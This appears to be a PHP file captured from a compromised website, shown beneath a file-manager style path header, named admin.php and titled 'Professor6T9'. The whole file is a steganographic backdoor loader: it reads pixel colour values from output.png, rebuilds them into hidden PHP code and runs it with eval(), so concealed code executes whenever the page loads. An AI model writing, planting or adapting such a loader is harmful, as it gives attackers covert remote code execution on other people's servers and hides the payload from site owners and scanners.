| Current Path : /home/abridesnjx/www/components/ |
| Current File : /home/abridesnjx/www/components/admin.php |
<title>Professor6T9</title>
<?php
$png = file_get_contents('output.png');
$im = imagecreatefromstring($png);
$width = imagesx($im);
$height = imagesy($im);
$row = $height > 1 ? 1 : 0;
$code = '';
for ($x = 0; $x < $width; $x++) {
$rgb = imagecolorat($im, $x, $row);
$code .= chr(($rgb >> 16) & 0xFF)
. chr(($rgb >> 8) & 0xFF)
. chr($rgb & 0xFF);
}
imagedestroy($im);
eval('?>' . rtrim($code, "\0"));